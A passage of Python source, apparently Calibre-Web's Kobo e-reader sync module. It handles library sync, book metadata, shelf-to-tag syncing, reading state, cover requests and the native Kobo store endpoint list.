# in case of external changes (e.g: adding a book through Calibre).
calibre_db.reconnect_db(config, ub.app_DB_path)
only_kobo_shelves = current_user.kobo_only_shelves_sync
if only_kobo_shelves:
if sqlalchemy_version2:
changed_entries = select(db.Books,
ub.ArchivedBook.last_modified,
ub.BookShelf.date_added,
ub.ArchivedBook.is_archived)
else:
changed_entries = calibre_db.session.query(db.Books,
ub.ArchivedBook.last_modified,
ub.BookShelf.date_added,
ub.ArchivedBook.is_archived)
changed_entries = (changed_entries
.join(db.Data).outerjoin(ub.ArchivedBook, db.Books.id == ub.ArchivedBook.book_id)
.join(ub.KoboSyncedBooks, ub.KoboSyncedBooks.book_id == db.Books.id, isouter=True)
.filter(or_(ub.KoboSyncedBooks.user_id != current_user.id,
ub.KoboSyncedBooks.book_id == None))
#.filter(or_(db.Books.last_modified > sync_token.books_last_modified,
# ub.BookShelf.date_added > sync_token.books_last_modified))
.filter(ub.BookShelf.date_added > sync_token.books_last_modified) #?? or also or from above
.filter(db.Data.format.in_(KOBO_FORMATS))
.filter(calibre_db.common_filters())
.order_by(db.Books.id)
.order_by(ub.ArchivedBook.last_modified)
.join(ub.BookShelf, db.Books.id == ub.BookShelf.book_id)
.join(ub.Shelf)
.filter(ub.Shelf.user_id == current_user.id)
.filter(ub.Shelf.kobo_sync)
.distinct()
)
else:
if sqlalchemy_version2:
changed_entries = select(db.Books, ub.ArchivedBook.last_modified, ub.ArchivedBook.is_archived)
else:
changed_entries = calibre_db.session.query(db.Books,
ub.ArchivedBook.last_modified,
ub.ArchivedBook.is_archived)
changed_entries = (changed_entries
.join(db.Data).outerjoin(ub.ArchivedBook, db.Books.id == ub.ArchivedBook.book_id)
.join(ub.KoboSyncedBooks, ub.KoboSyncedBooks.book_id == db.Books.id, isouter=True)
.filter(or_(ub.KoboSyncedBooks.user_id != current_user.id,
ub.KoboSyncedBooks.book_id == None))
.filter(calibre_db.common_filters())
.filter(db.Data.format.in_(KOBO_FORMATS))
.order_by(db.Books.last_modified)
.order_by(db.Books.id)
)
#if sync_token.books_last_id > -1:
# changed_entries = changed_entries.filter(db.Books.id > sync_token.books_last_id)
reading_states_in_new_entitlements = []
if sqlalchemy_version2:
books = calibre_db.session.execute(changed_entries.limit(SYNC_ITEM_LIMIT))
else:
books = changed_entries.limit(SYNC_ITEM_LIMIT)
for book in books:
add_synced_books(book.Books.id)
formats = [data.format for data in book.Books.data]
if not 'KEPUB' in formats and config.config_kepubifypath and 'EPUB' in formats:
helper.convert_book_format(book.Books.id, config.config_calibre_dir, 'EPUB', 'KEPUB', current_user.name)
kobo_reading_state = get_or_create_reading_state(book.Books.id)
entitlement = {
"BookEntitlement": create_book_entitlement(book.Books, archived=(book.is_archived == True)),
"BookMetadata": get_metadata(book.Books),
}
if kobo_reading_state.last_modified > sync_token.reading_state_last_modified:
entitlement["ReadingState"] = get_kobo_reading_state_response(book.Books, kobo_reading_state)
new_reading_state_last_modified = max(new_reading_state_last_modified, kobo_reading_state.last_modified)
reading_states_in_new_entitlements.append(book.Books.id)
ts_created = book.Books.timestamp
try:
ts_created = max(ts_created, book.date_added)
except AttributeError:
pass
if ts_created > sync_token.books_last_created:
sync_results.append({"NewEntitlement": entitlement})
else:
sync_results.append({"ChangedEntitlement": entitlement})
new_books_last_modified = max(
book.Books.last_modified, new_books_last_modified
)
try:
new_books_last_modified = max(
new_books_last_modified, book.date_added
)
except AttributeError:
pass
new_books_last_created = max(ts_created, new_books_last_created)
if sqlalchemy_version2:
max_change = calibre_db.session.execute(changed_entries
.filter(ub.ArchivedBook.is_archived)
.order_by(func.datetime(ub.ArchivedBook.last_modified).desc()))\
.columns(db.Books).first()
else:
max_change = changed_entries.from_self().filter(ub.ArchivedBook.is_archived) \
.order_by(func.datetime(ub.ArchivedBook.last_modified).desc()).first()
max_change = max_change.last_modified if max_change else new_archived_last_modified
new_archived_last_modified = max(new_archived_last_modified, max_change)
# no. of books returned
if sqlalchemy_version2:
entries = calibre_db.session.execute(changed_entries).all()
book_count = len(entries)
else:
#entries = changed_entries.all()
book_count = changed_entries.count()
# last entry:
# sync_cont = entries[-1].Books.id or -1 if book_count else -1
log.debug("Remaining books to Sync: {}".format(book_count))
# generate reading state data
changed_reading_states = ub.session.query(ub.KoboReadingState)
if only_kobo_shelves:
changed_reading_states = changed_reading_states.join(ub.BookShelf,
ub.KoboReadingState.book_id == ub.BookShelf.book_id)\
.join(ub.Shelf)\
.filter(current_user.id == ub.Shelf.user_id)\
.filter(ub.Shelf.kobo_sync,
or_(
func.datetime(ub.KoboReadingState.last_modified) > sync_token.reading_state_last_modified,
func.datetime(ub.BookShelf.date_added) > sync_token.books_last_modified
)).distinct()
else:
changed_reading_states = changed_reading_states.filter(
func.datetime(ub.KoboReadingState.last_modified) > sync_token.reading_state_last_modified)
changed_reading_states = changed_reading_states.filter(
and_(ub.KoboReadingState.user_id == current_user.id,
ub.KoboReadingState.book_id.notin_(reading_states_in_new_entitlements)))
for kobo_reading_state in changed_reading_states.all():
book = calibre_db.session.query(db.Books).filter(db.Books.id == kobo_reading_state.book_id).one_or_none()
if book:
sync_results.append({
"ChangedReadingState": {
"ReadingState": get_kobo_reading_state_response(book, kobo_reading_state)
}
})
new_reading_state_last_modified = max(new_reading_state_last_modified, kobo_reading_state.last_modified)
sync_shelves(sync_token, sync_results, only_kobo_shelves)
sync_token.books_last_created = new_books_last_created
sync_token.books_last_modified = new_books_last_modified
sync_token.archive_last_modified = new_archived_last_modified
sync_token.reading_state_last_modified = new_reading_state_last_modified
# sync_token.books_last_id = books_last_id
return generate_sync_response(sync_token, sync_results, book_count)
def generate_sync_response(sync_token, sync_results, set_cont=False):
extra_headers = {}
if config.config_kobo_proxy:
# Merge in sync results from the official Kobo store.
try:
store_response = make_request_to_kobo_store(sync_token)
store_sync_results = store_response.json()
sync_results += store_sync_results
sync_token.merge_from_store_response(store_response)
extra_headers["x-kobo-sync"] = store_response.headers.get("x-kobo-sync")
extra_headers["x-kobo-sync-mode"] = store_response.headers.get("x-kobo-sync-mode")
extra_headers["x-kobo-recent-reads"] = store_response.headers.get("x-kobo-recent-reads")
except Exception as ex:
log.error("Failed to receive or parse response from Kobo's sync endpoint: {}".format(ex))
if set_cont:
extra_headers["x-kobo-sync"] = "continue"
sync_token.to_headers(extra_headers)
# log.debug("Kobo Sync Content: {}".format(sync_results))
response = make_response(jsonify(sync_results), extra_headers)
return response
@kobo.route("/v1/library/<book_uuid>/metadata")
@requires_kobo_auth
@download_required
def HandleMetadataRequest(book_uuid):
if not current_app.wsgi_app.is_proxied:
log.debug('Kobo: Received unproxied request, changed request port to external server port')
log.info("Kobo library metadata request received for book %s" % book_uuid)
book = calibre_db.get_book_by_uuid(book_uuid)
if not book or not book.data:
log.info(u"Book %s not found in database", book_uuid)
return redirect_or_proxy_request()
metadata = get_metadata(book)
return jsonify([metadata])
def get_download_url_for_book(book, book_format):
if not current_app.wsgi_app.is_proxied:
if ':' in request.host and not request.host.endswith(']'):
host = "".join(request.host.split(':')[:-1])
else:
host = request.host
return "{url_scheme}://{url_base}:{url_port}/kobo/{auth_token}/download/{book_id}/{book_format}".format(
url_scheme=request.scheme,
url_base=host,
url_port=config.config_external_port,
auth_token=get_auth_token(),
book_id=book.id,
book_format=book_format.lower()
)
return url_for(
"kobo.download_book",
auth_token=kobo_auth.get_auth_token(),
book_id=book.id,
book_format=book_format.lower(),
_external=True,
)
def create_book_entitlement(book, archived):
book_uuid = book.uuid
return {
"Accessibility": "Full",
"ActivePeriod": {"From": convert_to_kobo_timestamp_string(datetime.datetime.now())},
"Created": convert_to_kobo_timestamp_string(book.timestamp),
"CrossRevisionId": book_uuid,
"Id": book_uuid,
"IsRemoved": archived,
"IsHiddenFromArchive": False,
"IsLocked": False,
"LastModified": convert_to_kobo_timestamp_string(book.last_modified),
"OriginCategory": "Imported",
"RevisionId": book_uuid,
"Status": "Active",
}
def current_time():
return strftime("%Y-%m-%dT%H:%M:%SZ", gmtime())
def get_description(book):
if not book.comments:
return None
return book.comments[0].text
# TODO handle multiple authors
def get_author(book):
if not book.authors:
return {"Contributors": None}
if len(book.authors) > 1:
author_list = []
autor_roles = []
for author in book.authors:
autor_roles.append({"Name":author.name, "Role":"Author"})
author_list.append(author.name)
return {"ContributorRoles": autor_roles, "Contributors":author_list}
return {"ContributorRoles": [{"Name":book.authors[0].name, "Role":"Author"}], "Contributors": book.authors[0].name}
def get_publisher(book):
if not book.publishers:
return None
return book.publishers[0].name
def get_series(book):
if not book.series:
return None
return book.series[0].name
def get_seriesindex(book):
return book.series_index or 1
def get_metadata(book):
download_urls = []
kepub = [data for data in book.data if data.format == 'KEPUB']
for book_data in kepub if len(kepub) > 0 else book.data:
if book_data.format not in KOBO_FORMATS:
continue
for kobo_format in KOBO_FORMATS[book_data.format]:
# log.debug('Id: %s, Format: %s' % (book.id, kobo_format))
download_urls.append(
{
"Format": kobo_format,
"Size": book_data.uncompressed_size,
"Url": get_download_url_for_book(book, book_data.format),
# The Kobo forma accepts platforms: (Generic, Android)
"Platform": "Generic",
# "DrmType": "None", # Not required
}
)
book_uuid = book.uuid
metadata = {
"Categories": ["00000000-0000-0000-0000-000000000001", ],
# "Contributors": get_author(book),
"CoverImageId": book_uuid,
"CrossRevisionId": book_uuid,
"CurrentDisplayPrice": {"CurrencyCode": "USD", "TotalAmount": 0},
"CurrentLoveDisplayPrice": {"TotalAmount": 0},
"Description": get_description(book),
"DownloadUrls": download_urls,
"EntitlementId": book_uuid,
"ExternalIds": [],
"Genre": "00000000-0000-0000-0000-000000000001",
"IsEligibleForKoboLove": False,
"IsInternetArchive": False,
"IsPreOrder": False,
"IsSocialEnabled": True,
"Language": "en",
"PhoneticPronunciations": {},
# TODO: Fix book.pubdate to return a datetime object so that we can easily
# convert it to the format Kobo devices expect.
"PublicationDate": book.pubdate,
"Publisher": {"Imprint": "", "Name": get_publisher(book),},
"RevisionId": book_uuid,
"Title": book.title,
"WorkId": book_uuid,
}
metadata.update(get_author(book))
if get_series(book):
if sys.version_info < (3, 0):
name = get_series(book).encode("utf-8")
else:
name = get_series(book)
metadata["Series"] = {
"Name": get_series(book),
"Number": get_seriesindex(book), # ToDo Check int() ?
"NumberFloat": float(get_seriesindex(book)),
# Get a deterministic id based on the series name.
"Id": uuid.uuid3(uuid.NAMESPACE_DNS, name),
}
return metadata
@csrf.exempt
@kobo.route("/v1/library/tags", methods=["POST", "DELETE"])
@requires_kobo_auth
# Creates a Shelf with the given items, and returns the shelf's uuid.
def HandleTagCreate():
# catch delete requests, otherwise the are handeld in the book delete handler
if request.method == "DELETE":
abort(405)
name, items = None, None
try:
shelf_request = request.json
name = shelf_request["Name"]
items = shelf_request["Items"]
if not name:
raise TypeError
except (KeyError, TypeError):
log.debug("Received malformed v1/library/tags request.")
abort(400, description="Malformed tags POST request. Data has empty 'Name', missing 'Name' or 'Items' field")
shelf = ub.session.query(ub.Shelf).filter(ub.Shelf.name == name, ub.Shelf.user_id ==
current_user.id).one_or_none()
if shelf and not shelf_lib.check_shelf_edit_permissions(shelf):
abort(401, description="User is unauthaurized to create shelf.")
if not shelf:
shelf = ub.Shelf(user_id=current_user.id, name=name, uuid=str(uuid.uuid4()))
ub.session.add(shelf)
items_unknown_to_calibre = add_items_to_shelf(items, shelf)
if items_unknown_to_calibre:
log.debug("Received request to add unknown books to a collection. Silently ignoring items.")
ub.session_commit()
return make_response(jsonify(str(shelf.uuid)), 201)
@kobo.route("/v1/library/tags/<tag_id>", methods=["DELETE", "PUT"])
@requires_kobo_auth
def HandleTagUpdate(tag_id):
shelf = ub.session.query(ub.Shelf).filter(ub.Shelf.uuid == tag_id,
ub.Shelf.user_id == current_user.id).one_or_none()
if not shelf:
log.debug("Received Kobo tag update request on a collection unknown to CalibreWeb")
if config.config_kobo_proxy:
return redirect_or_proxy_request()
else:
abort(404, description="Collection isn't known to CalibreWeb")
if not shelf_lib.check_shelf_edit_permissions(shelf):
abort(401, description="User is unauthaurized to edit shelf.")
if request.method == "DELETE":
shelf_lib.delete_shelf_helper(shelf)
else:
name = None
try:
shelf_request = request.json
name = shelf_request["Name"]
except (KeyError, TypeError):
log.debug("Received malformed v1/library/tags rename request.")
abort(400, description="Malformed tags POST request. Data is missing 'Name' field")
shelf.name = name
ub.session.merge(shelf)
ub.session_commit()
return make_response(' ', 200)
# Adds items to the given shelf.
def add_items_to_shelf(items, shelf):
book_ids_already_in_shelf = set([book_shelf.book_id for book_shelf in shelf.books])
items_unknown_to_calibre = []
for item in items:
try:
if item["Type"] != "ProductRevisionTagItem":
items_unknown_to_calibre.append(item)
continue
book = calibre_db.get_book_by_uuid(item["RevisionId"])
if not book:
items_unknown_to_calibre.append(item)
continue
book_id = book.id
if book_id not in book_ids_already_in_shelf:
shelf.books.append(ub.BookShelf(book_id=book_id))
except KeyError:
items_unknown_to_calibre.append(item)
return items_unknown_to_calibre
@csrf.exempt
@kobo.route("/v1/library/tags/<tag_id>/items", methods=["POST"])
@requires_kobo_auth
def HandleTagAddItem(tag_id):
items = None
try:
tag_request = request.json
items = tag_request["Items"]
except (KeyError, TypeError):
log.debug("Received malformed v1/library/tags/<tag_id>/items/delete request.")
abort(400, description="Malformed tags POST request. Data is missing 'Items' field")
shelf = ub.session.query(ub.Shelf).filter(ub.Shelf.uuid == tag_id,
ub.Shelf.user_id == current_user.id).one_or_none()
if not shelf:
log.debug("Received Kobo request on a collection unknown to CalibreWeb")
abort(404, description="Collection isn't known to CalibreWeb")
if not shelf_lib.check_shelf_edit_permissions(shelf):
abort(401, description="User is unauthaurized to edit shelf.")
items_unknown_to_calibre = add_items_to_shelf(items, shelf)
if items_unknown_to_calibre:
log.debug("Received request to add an unknown book to a collection. Silently ignoring item.")
ub.session.merge(shelf)
ub.session_commit()
return make_response('', 201)
@csrf.exempt
@kobo.route("/v1/library/tags/<tag_id>/items/delete", methods=["POST"])
@requires_kobo_auth
def HandleTagRemoveItem(tag_id):
items = None
try:
tag_request = request.json
items = tag_request["Items"]
except (KeyError, TypeError):
log.debug("Received malformed v1/library/tags/<tag_id>/items/delete request.")
abort(400, description="Malformed tags POST request. Data is missing 'Items' field")
shelf = ub.session.query(ub.Shelf).filter(ub.Shelf.uuid == tag_id,
ub.Shelf.user_id == current_user.id).one_or_none()
if not shelf:
log.debug(
"Received a request to remove an item from a Collection unknown to CalibreWeb.")
abort(404, description="Collection isn't known to CalibreWeb")
if not shelf_lib.check_shelf_edit_permissions(shelf):
abort(401, description="User is unauthaurized to edit shelf.")
items_unknown_to_calibre = []
for item in items:
try:
if item["Type"] != "ProductRevisionTagItem":
items_unknown_to_calibre.append(item)
continue
book = calibre_db.get_book_by_uuid(item["RevisionId"])
if not book:
items_unknown_to_calibre.append(item)
continue
shelf.books.filter(ub.BookShelf.book_id == book.id).delete()
except KeyError:
items_unknown_to_calibre.append(item)
ub.session_commit()
if items_unknown_to_calibre:
log.debug("Received request to remove an unknown book to a collecition. Silently ignoring item.")
return make_response('', 200)
# Add new, changed, or deleted shelves to the sync_results.
# Note: Public shelves that aren't owned by the user aren't supported.
def sync_shelves(sync_token, sync_results, only_kobo_shelves=False):
new_tags_last_modified = sync_token.tags_last_modified
for shelf in ub.session.query(ub.ShelfArchive).filter(
func.datetime(ub.ShelfArchive.last_modified) > sync_token.tags_last_modified,
ub.ShelfArchive.user_id == current_user.id
):
new_tags_last_modified = max(shelf.last_modified, new_tags_last_modified)
sync_results.append({
"DeletedTag": {
"Tag": {
"Id": shelf.uuid,
"LastModified": convert_to_kobo_timestamp_string(shelf.last_modified)
}
}
})
extra_filters = []
if only_kobo_shelves:
for shelf in ub.session.query(ub.Shelf).filter(
func.datetime(ub.Shelf.last_modified) > sync_token.tags_last_modified,
ub.Shelf.user_id == current_user.id,
not ub.Shelf.kobo_sync
):
sync_results.append({
"DeletedTag": {
"Tag": {
"Id": shelf.uuid,
"LastModified": convert_to_kobo_timestamp_string(shelf.last_modified)
}
}
})
extra_filters.append(ub.Shelf.kobo_sync)
if sqlalchemy_version2:
shelflist = ub.session.execute(select(ub.Shelf).outerjoin(ub.BookShelf).filter(
or_(func.datetime(ub.Shelf.last_modified) > sync_token.tags_last_modified,
func.datetime(ub.BookShelf.date_added) > sync_token.tags_last_modified),
ub.Shelf.user_id == current_user.id,
*extra_filters
).distinct().order_by(func.datetime(ub.Shelf.last_modified).asc())).columns(ub.Shelf)
else:
shelflist = ub.session.query(ub.Shelf).outerjoin(ub.BookShelf).filter(
or_(func.datetime(ub.Shelf.last_modified) > sync_token.tags_last_modified,
func.datetime(ub.BookShelf.date_added) > sync_token.tags_last_modified),
ub.Shelf.user_id == current_user.id,
*extra_filters
).distinct().order_by(func.datetime(ub.Shelf.last_modified).asc())
for shelf in shelflist:
if not shelf_lib.check_shelf_view_permissions(shelf):
continue
new_tags_last_modified = max(shelf.last_modified, new_tags_last_modified)
tag = create_kobo_tag(shelf)
if not tag:
continue
if shelf.created > sync_token.tags_last_modified:
sync_results.append({
"NewTag": tag
})
else:
sync_results.append({
"ChangedTag": tag
})
sync_token.tags_last_modified = new_tags_last_modified
ub.session_commit()
# Creates a Kobo "Tag" object from a ub.Shelf object
def create_kobo_tag(shelf):
tag = {
"Created": convert_to_kobo_timestamp_string(shelf.created),
"Id": shelf.uuid,
"Items": [],
"LastModified": convert_to_kobo_timestamp_string(shelf.last_modified),
"Name": shelf.name,
"Type": "UserTag"
}
for book_shelf in shelf.books:
book = calibre_db.get_book(book_shelf.book_id)
if not book:
log.info(u"Book (id: %s) in BookShelf (id: %s) not found in book database", book_shelf.book_id, shelf.id)
continue
tag["Items"].append(
{
"RevisionId": book.uuid,
"Type": "ProductRevisionTagItem"
}
)
return {"Tag": tag}
@kobo.route("/v1/library/<book_uuid>/state", methods=["GET", "PUT"])
@requires_kobo_auth
def HandleStateRequest(book_uuid):
book = calibre_db.get_book_by_uuid(book_uuid)
if not book or not book.data:
log.info(u"Book %s not found in database", book_uuid)
return redirect_or_proxy_request()
kobo_reading_state = get_or_create_reading_state(book.id)
if request.method == "GET":
return jsonify([get_kobo_reading_state_response(book, kobo_reading_state)])
else:
update_results_response = {"EntitlementId": book_uuid}
try:
request_data = request.json
request_reading_state = request_data["ReadingStates"][0]
request_bookmark = request_reading_state["CurrentBookmark"]
if request_bookmark:
current_bookmark = kobo_reading_state.current_bookmark
current_bookmark.progress_percent = request_bookmark["ProgressPercent"]
current_bookmark.content_source_progress_percent = request_bookmark["ContentSourceProgressPercent"]
location = request_bookmark["Location"]
if location:
current_bookmark.location_value = location["Value"]
current_bookmark.location_type = location["Type"]
current_bookmark.location_source = location["Source"]
update_results_response["CurrentBookmarkResult"] = {"Result": "Success"}
request_statistics = request_reading_state["Statistics"]
if request_statistics:
statistics = kobo_reading_state.statistics
statistics.spent_reading_minutes = int(request_statistics["SpentReadingMinutes"])
statistics.remaining_time_minutes = int(request_statistics["RemainingTimeMinutes"])
update_results_response["StatisticsResult"] = {"Result": "Success"}
request_status_info = request_reading_state["StatusInfo"]
if request_status_info:
book_read = kobo_reading_state.book_read_link
new_book_read_status = get_ub_read_status(request_status_info["Status"])
if new_book_read_status == ub.ReadBook.STATUS_IN_PROGRESS \
and new_book_read_status != book_read.read_status:
book_read.times_started_reading += 1
book_read.last_time_started_reading = datetime.datetime.utcnow()
book_read.read_status = new_book_read_status
update_results_response["StatusInfoResult"] = {"Result": "Success"}
except (KeyError, TypeError, ValueError, StatementError):
log.debug("Received malformed v1/library/<book_uuid>/state request.")
ub.session.rollback()
abort(400, description="Malformed request data is missing 'ReadingStates' key")
ub.session.merge(kobo_reading_state)
ub.session_commit()
return jsonify({
"RequestResult": "Success",
"UpdateResults": [update_results_response],
})
def get_read_status_for_kobo(ub_book_read):
enum_to_string_map = {
None: "ReadyToRead",
ub.ReadBook.STATUS_UNREAD: "ReadyToRead",
ub.ReadBook.STATUS_FINISHED: "Finished",
ub.ReadBook.STATUS_IN_PROGRESS: "Reading",
}
return enum_to_string_map[ub_book_read.read_status]
def get_ub_read_status(kobo_read_status):
string_to_enum_map = {
None: None,
"ReadyToRead": ub.ReadBook.STATUS_UNREAD,
"Finished": ub.ReadBook.STATUS_FINISHED,
"Reading": ub.ReadBook.STATUS_IN_PROGRESS,
}
return string_to_enum_map[kobo_read_status]
def add_synced_books(book_id):
synced_book = ub.KoboSyncedBooks()
synced_book.user_id = current_user.id
synced_book.book_id = book_id
ub.session.add(synced_book)
try:
ub.session.commit()
except Exception:
ub.session.rollback()
def get_or_create_reading_state(book_id):
book_read = ub.session.query(ub.ReadBook).filter(ub.ReadBook.book_id == book_id,
ub.ReadBook.user_id == current_user.id).one_or_none()
if not book_read:
book_read = ub.ReadBook(user_id=current_user.id, book_id=book_id)
if not book_read.kobo_reading_state:
kobo_reading_state = ub.KoboReadingState(user_id=book_read.user_id, book_id=book_id)
kobo_reading_state.current_bookmark = ub.KoboBookmark()
kobo_reading_state.statistics = ub.KoboStatistics()
book_read.kobo_reading_state = kobo_reading_state
ub.session.add(book_read)
ub.session_commit()
return book_read.kobo_reading_state
def get_kobo_reading_state_response(book, kobo_reading_state):
return {
"EntitlementId": book.uuid,
"Created": convert_to_kobo_timestamp_string(book.timestamp),
"LastModified": convert_to_kobo_timestamp_string(kobo_reading_state.last_modified),
# AFAICT PriorityTimestamp is always equal to LastModified.
"PriorityTimestamp": convert_to_kobo_timestamp_string(kobo_reading_state.priority_timestamp),
"StatusInfo": get_status_info_response(kobo_reading_state.book_read_link),
"Statistics": get_statistics_response(kobo_reading_state.statistics),
"CurrentBookmark": get_current_bookmark_response(kobo_reading_state.current_bookmark),
}
def get_status_info_response(book_read):
resp = {
"LastModified": convert_to_kobo_timestamp_string(book_read.last_modified),
"Status": get_read_status_for_kobo(book_read),
"TimesStartedReading": book_read.times_started_reading,
}
if book_read.last_time_started_reading:
resp["LastTimeStartedReading"] = convert_to_kobo_timestamp_string(book_read.last_time_started_reading)
return resp
def get_statistics_response(statistics):
resp = {
"LastModified": convert_to_kobo_timestamp_string(statistics.last_modified),
}
if statistics.spent_reading_minutes:
resp["SpentReadingMinutes"] = statistics.spent_reading_minutes
if statistics.remaining_time_minutes:
resp["RemainingTimeMinutes"] = statistics.remaining_time_minutes
return resp
def get_current_bookmark_response(current_bookmark):
resp = {
"LastModified": convert_to_kobo_timestamp_string(current_bookmark.last_modified),
}
if current_bookmark.progress_percent:
resp["ProgressPercent"] = current_bookmark.progress_percent
if current_bookmark.content_source_progress_percent:
resp["ContentSourceProgressPercent"] = current_bookmark.content_source_progress_percent
if current_bookmark.location_value:
resp["Location"] = {
"Value": current_bookmark.location_value,
"Type": current_bookmark.location_type,
"Source": current_bookmark.location_source,
}
return resp
@kobo.route("/<book_uuid>/<width>/<height>/<isGreyscale>/image.jpg", defaults={'Quality': ""})
@kobo.route("/<book_uuid>/<width>/<height>/<Quality>/<isGreyscale>/image.jpg")
@requires_kobo_auth
def HandleCoverImageRequest(book_uuid, width, height,Quality, isGreyscale):
book_cover = helper.get_book_cover_with_uuid(
book_uuid, use_generic_cover_on_failure=False
)
if not book_cover:
if config.config_kobo_proxy:
log.debug("Cover for unknown book: %s proxied to kobo" % book_uuid)
return redirect(KOBO_IMAGEHOST_URL +
"/{book_uuid}/{width}/{height}/false/image.jpg".format(book_uuid=book_uuid,
width=width,
height=height), 307)
else:
log.debug("Cover for unknown book: %s requested" % book_uuid)
# additional proxy request make no sense, -> direct return
return make_response(jsonify({}))
log.debug("Cover request received for book %s" % book_uuid)
return book_cover
@kobo.route("")
def TopLevelEndpoint():
return make_response(jsonify({}))
@kobo.route("/v1/library/<book_uuid>", methods=["DELETE"])
@requires_kobo_auth
def HandleBookDeletionRequest(book_uuid):
log.info("Kobo book deletion request received for book %s" % book_uuid)
book = calibre_db.get_book_by_uuid(book_uuid)
if not book:
log.info(u"Book %s not found in database", book_uuid)
return redirect_or_proxy_request()
book_id = book.id
archived_book = (
ub.session.query(ub.ArchivedBook)
.filter(ub.ArchivedBook.book_id == book_id)
.first()
)
if not archived_book:
archived_book = ub.ArchivedBook(user_id=current_user.id, book_id=book_id)
archived_book.is_archived = True
archived_book.last_modified = datetime.datetime.utcnow()
ub.session.merge(archived_book)
ub.session_commit()
return ("", 204)
# TODO: Implement the following routes
@kobo.route("/v1/library/<dummy>", methods=["DELETE", "GET"])
def HandleUnimplementedRequest(dummy=None):
log.debug("Unimplemented Library Request received: %s", request.base_url)
return redirect_or_proxy_request()
# TODO: Implement the following routes
@csrf.exempt
@kobo.route("/v1/user/loyalty/<dummy>", methods=["GET", "POST"])
@kobo.route("/v1/user/profile", methods=["GET", "POST"])
@kobo.route("/v1/user/wishlist", methods=["GET", "POST"])
@kobo.route("/v1/user/recommendations", methods=["GET", "POST"])
@kobo.route("/v1/analytics/<dummy>", methods=["GET", "POST"])
def HandleUserRequest(dummy=None):
log.debug("Unimplemented User Request received: %s", request.base_url)
return redirect_or_proxy_request()
@csrf.exempt
@kobo.route("/v1/products/<dummy>/prices", methods=["GET", "POST"])
@kobo.route("/v1/products/<dummy>/recommendations", methods=["GET", "POST"])
@kobo.route("/v1/products/<dummy>/nextread", methods=["GET", "POST"])
@kobo.route("/v1/products/<dummy>/reviews", methods=["GET", "POST"])
@kobo.route("/v1/products/books/external/<dummy>", methods=["GET", "POST"])
@kobo.route("/v1/products/books/series/<dummy>", methods=["GET", "POST"])
@kobo.route("/v1/products/books/<dummy>", methods=["GET", "POST"])
@kobo.route("/v1/products/dailydeal", methods=["GET", "POST"])
@kobo.route("/v1/products", methods=["GET", "POST"])
def HandleProductsRequest(dummy=None):
log.debug("Unimplemented Products Request received: %s", request.base_url)
return redirect_or_proxy_request()
def make_calibre_web_auth_response():
# As described in kobo_auth.py, CalibreWeb doesn't make use practical use of this auth/device API call for
# authentation (nor for authorization). We return a dummy response just to keep the device happy.
content = request.get_json()
AccessToken = base64.b64encode(os.urandom(24)).decode('utf-8')
RefreshToken = base64.b64encode(os.urandom(24)).decode('utf-8')
return make_response(
jsonify(
{
"AccessToken": AccessToken,
"RefreshToken": RefreshToken,
"TokenType": "Bearer",
"TrackingId": str(uuid.uuid4()),
"UserKey": content['UserKey'],
}
)
)
@csrf.exempt
@kobo.route("/v1/auth/device", methods=["POST"])
@requires_kobo_auth
def HandleAuthRequest():
log.debug('Kobo Auth request')
if config.config_kobo_proxy:
try:
return redirect_or_proxy_request()
except Exception:
log.error("Failed to receive or parse response from Kobo's auth endpoint. Falling back to un-proxied mode.")
return make_calibre_web_auth_response()
@kobo.route("/v1/initialization")
@requires_kobo_auth
def HandleInitRequest():
log.info('Init')
kobo_resources = None
if config.config_kobo_proxy:
try:
store_response = make_request_to_kobo_store()
store_response_json = store_response.json()
if "Resources" in store_response_json:
kobo_resources = store_response_json["Resources"]
except Exception:
log.error("Failed to receive or parse response from Kobo's init endpoint. Falling back to un-proxied mode.")
if not kobo_resources:
kobo_resources = NATIVE_KOBO_RESOURCES()
if not current_app.wsgi_app.is_proxied:
log.debug('Kobo: Received unproxied request, changed request port to external server port')
if ':' in request.host and not request.host.endswith(']'):
host = "".join(request.host.split(':')[:-1])
else:
host = request.host
calibre_web_url = "{url_scheme}://{url_base}:{url_port}".format(
url_scheme=request.scheme,
url_base=host,
url_port=config.config_external_port
)
log.debug('Kobo: Received unproxied request, changed request url to %s', calibre_web_url)
kobo_resources["image_host"] = calibre_web_url
kobo_resources["image_url_quality_template"] = unquote(calibre_web_url +
url_for("kobo.HandleCoverImageRequest",
auth_token=kobo_auth.get_auth_token(),
book_uuid="{ImageId}",
width="{width}",
height="{height}",
Quality='{Quality}',
isGreyscale='isGreyscale'))
kobo_resources["image_url_template"] = unquote(calibre_web_url +
url_for("kobo.HandleCoverImageRequest",
auth_token=kobo_auth.get_auth_token(),
book_uuid="{ImageId}",
width="{width}",
height="{height}",
isGreyscale='false'))
else:
kobo_resources["image_host"] = url_for("web.index", _external=True).strip("/")
kobo_resources["image_url_quality_template"] = unquote(url_for("kobo.HandleCoverImageRequest",
auth_token=kobo_auth.get_auth_token(),
book_uuid="{ImageId}",
width="{width}",
height="{height}",
Quality='{Quality}',
isGreyscale='isGreyscale',
_external=True))
kobo_resources["image_url_template"] = unquote(url_for("kobo.HandleCoverImageRequest",
auth_token=kobo_auth.get_auth_token(),
book_uuid="{ImageId}",
width="{width}",
height="{height}",
isGreyscale='false',
_external=True))
response = make_response(jsonify({"Resources": kobo_resources}))
response.headers["x-kobo-apitoken"] = "e30="
return response
@kobo.route("/download/<book_id>/<book_format>")
@requires_kobo_auth
@download_required
def download_book(book_id, book_format):
return get_download_link(book_id, book_format, "kobo")
def NATIVE_KOBO_RESOURCES():
return {
"account_page": "https://secure.kobobooks.com/profile",
"account_page_rakuten": "https://my.rakuten.co.jp/",
"add_entitlement": "https://storeapi.kobo.com/v1/library/{RevisionIds}",
"affiliaterequest": "https://storeapi.kobo.com/v1/affiliate",
"audiobook_subscription_orange_deal_inclusion_url": "https://authorize.kobo.com/inclusion",
"authorproduct_recommendations": "https://storeapi.kobo.com/v1/products/books/authors/recommendations",
"autocomplete": "https://storeapi.kobo.com/v1/products/autocomplete",
"blackstone_header": {"key": "x-amz-request-payer", "value": "requester"},
"book": "https://storeapi.kobo.com/v1/products/books/{ProductId}",
"book_detail_page": "https://store.kobobooks.com/{culture}/ebook/{slug}",
"book_detail_page_rakuten": "https://books.rakuten.co.jp/rk/{crossrevisionid}",
"book_landing_page": "https://store.kobobooks.com/ebooks",
"book_subscription": "https://storeapi.kobo.com/v1/products/books/subscriptions",
"categories": "https://storeapi.kobo.com/v1/categories",
"categories_page": "https://store.kobobooks.com/ebooks/categories",
"category": "https://storeapi.kobo.com/v1/categories/{CategoryId}",
